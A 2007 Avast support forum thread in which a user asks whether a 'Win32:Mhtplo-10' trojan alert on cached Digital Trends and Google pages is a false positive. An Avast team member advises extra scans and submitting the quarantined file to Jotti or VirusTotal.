Author Topic: Win32:Mhtplo-10 [Trj] - False positive? Please help!  (Read 4899 times)

0 Members and 1 Guest are viewing this topic.

SteveO29

  • Guest
Win32:Mhtplo-10 [Trj] - False positive? Please help!
« on: November 30, 2007, 05:26:38 AM »
Hello,

I hope someone here could help shed some light on an incident that happend to me.

While browsing the web, I received this alert from Avast!

--------------------------------------

11/29/2007 8:48:08 PM   SYSTEM   1412   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://forums.digitaltrends.com/archive/index.php/t-4230.html\unp137460016" file. 

11/29/2007 8:48:33 PM   SYSTEM   1412   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\I4GUG4E9\t-4230[1].htm" file. 

--------------------------------------

The prompt told me not to panic and to move the file to the virus chest. But when I tried.. I got another prompt from Avast! telling me that the file was in use and that I was not able to move the file to the chest. So I clicked "no action". I then shut down my browser and scanned the folder where the trojan was found and it was found again.. this time I ~was~ able to move the file to the chest.

Since then I ran another full Avast! scan.. and it came up clean.
I also did a scan with AVG's Anti-Spyware and Spybot's Search and Destroy.. both also came up clean.
Does this mean I have nothing to worry about?

I just have a funny feeling that this was a false positive on Avast's part because I've gone to the DIgital Trends site before and it seems like a reputable site. Could someone tell me if this site was really infected with this trojan?

Any replies would be greatly appreciated!

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #1 on: November 30, 2007, 12:34:33 PM »
Does this mean I have nothing to worry about?
Most probably. I will just suggest:
1. avast boot time scanning.
2. Install and run SuperAntispyware and/or SpywareTerminator.

I just have a funny feeling that this was a false positive on Avast's part because I've gone to the DIgital Trends site before and it seems like a reputable site. Could someone tell me if this site was really infected with this trojan?
Do you still have the file in your computer? You can submit it to Jotti.
Although it seems clean...
The best things in life are free.

SteveO29

  • Guest
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #2 on: November 30, 2007, 05:59:07 PM »
Thank you SO very much for the reply Tech! This had me worried for most of the night.

Quote from: Tech
Most probably. I will just suggest:
1. avast boot time scanning.
2. Install and run SuperAntispyware and/or SpywareTerminator.

Well I did a full thorough scan with Avast! and nothing showed up.
And I also ran scans with AVG's Anti-Spyware and Spybots's Search and Destroy.. and those scans were also negative.
Is it really necessary is try yet another Anti-Spyware program?

Quote from: Tech
Do you still have the file in your computer? You can submit it to Jotti.
Although it seems clean...

Well it's still in Avast's virus chest. I'm not sure how I would take it out to send it to Jotti.

I did a quick seach on this forum and found this post.

http://forum.avast.com/index.php?topic=20580.0

What happened to this person seems to be the same thing that happened to me. Except his alert was for warning for Win32.Mhtplo-30 [trj] where as mine was an alert for Win32:Mhtplo-10 [trj]. I noticed at the end of this thread someone said..

Quote from: Delta
the file name was t,19100[1].htm.

I wouldn't worry about it; it is an obvious FP

The name of my file is 4-230[1].htm which is very similar. Is there any way I can be certain this is a false positive?

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #3 on: November 30, 2007, 06:22:41 PM »
Is it really necessary is try yet another Anti-Spyware program?
It's up to you. But a second/third opinion is not bad...

Well it's still in Avast's virus chest. I'm not sure how I would take it out to send it to Jotti.
You need to extract the file (maybe to an USB drive), zip it with a password like virus and send it to analysis. Or send the file from Chest with a link to this thread in the comment.

Is there any way I can be certain this is a false positive?
Yes, submit it to VirusTotal (or Jotti).
The best things in life are free.

SteveO29

  • Guest
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #4 on: November 30, 2007, 06:48:47 PM »
Hello Tech and thank you again for replying.

I was able to extract the file from the virus chest. I zipped up the file and submitted it to Jotti. These were the results..

A-Squared Found      nothing
AntiVir Found      HTML/Exploit.Mhtml
ArcaVir Found      nothing
Avast Found      Win32:Mhtplo-10
AVG Antivirus Found   nothing
BitDefender Found      nothing
ClamAV Found      Exploit.HTML.MHTRedir-8
CPsecure Found      Troj.Exploit.HTML.Mht
Dr.Web Found      nothing
F-Prot Antivirus Found   nothing
F-Secure Anti-Virus Found   nothing
Fortinet Found      nothing
Ikarus Found      nothing
Kaspersky Anti-Virus Found   nothing
NOD32 Found      nothing
Norman Virus Control Found  nothing
Panda Antivirus Found   nothing
Rising Antivirus Found   nothing
Sophos Antivirus Found   nothing
VirusBuster Found      nothing
VBA32 Found      nothing

The file is no longer on my computer, it's still in Avast's virus chest. And as I said before.. all scans come up clean. Do I have anything to worry about?

SteveO29

  • Guest
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #5 on: November 30, 2007, 07:04:39 PM »
I had this warning yet again!

While searcing for information on Google for Mhtplo-10, the same waning came up.

This simply HAS to be a false positive, how can this alert come up from doing a Google search?

This is from my Avast! log.

-------------------------------------------------------------------------

11/30/2007 11:54:03 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp266340129" file.
 
11/30/2007 11:54:13 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[1].htm" file.
 
11/30/2007 11:54:40 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "http://www.google.com/search?q=Win32:Mhtplo&hl=en&start=10&sa=N\unp3580908" file.
 
11/30/2007 11:54:41 AM   SYSTEM   1404   Sign of "Win32:Mhtplo-10 [trj]" has been found in "C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\9I66EBDU\search[2].htm" file. 

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #6 on: November 30, 2007, 07:48:26 PM »
Now, I'm not so sure it's not an exploit and you should stay away from this file. But, could be also a false positive.
Can you submit it to Virustotal?

Virus Total is the best, in our opinion because:
1) It uses the Windows version of the AVs so avast has more unpackers for windows and that is the version most are using.
2) There are 27 different scanning engines greater than the others.
3) It also has an email submission option for periods when they are busy and you get a reply.
4) It can cue the submission and you can carry on browsing and you will eventually (not to long) get your result displayed.
The best things in life are free.

SteveO29

  • Guest
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #7 on: November 30, 2007, 08:42:14 PM »

Hello Tech

Thank you so much for taking the time to answer my questions!

Yes, I will try VirusTotal.

But I'm curious, I can see an alert like this popping up when I'm browsing unknown sites. But to see this alert pop up when I'm on a Google search page or when I'm at other reputable sites like Digital Trends just doesn't make sense.

Even if I submit these .htm files to VirusTotal and they come up positive, isn't it still possible that they could be a false positive? I mean, the .htm file could contain lines that make it ~look~ like a trojan when in fact it's not. Why else would Avast detect this trojan on a Google search page? I didn't even click any links on it. It was even detected as a trojan on 4 of the virus detectors on Jotti.. though the majority of them found nothing.

Isn't it possible that the Web Shield is just a bit sensitive?

Also.. IF my computer does have this Win32:Mhtplo-10 [trj], what would happen? My computer is acting fine and I don't see any unusual processes running. And the files in question are still in the Avast! virus chest.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Win32:Mhtplo-10 [Trj] - False positive? Please help!
« Reply #8 on: November 30, 2007, 10:19:03 PM »
But I'm curious, I can see an alert like this popping up when I'm browsing unknown sites. But to see this alert pop up when I'm on a Google search page or when I'm at other reputable sites like Digital Trends just doesn't make sense.
Yes it makes... at least, it could make sense.
http://forum.avast.com/index.php?topic=31730.0
http://forum.avast.com/index.php?topic=29160.0

Even if I submit these .htm files to VirusTotal and they come up positive, isn't it still possible that they could be a false positive? I mean, the .htm file could contain lines that make it ~look~ like a trojan when in fact it's not. Why else would Avast detect this trojan on a Google search page? I didn't even click any links on it.
WebShield detects virus on-the-fly, before saving files to your disk, before you click...
About sure, there is no sure, but depending on VirusTotal results we can make a good guess.

Also.. IF my computer does have this Win32:Mhtplo-10 [trj], what would happen? My computer is acting fine and I don't see any unusual processes running. And the files in question are still in the Avast! virus chest.
If it is an avast false positive, no problem, you can restore the files later.
If it is a real infection, no problem, it is already on Chest.
The best things in life are free.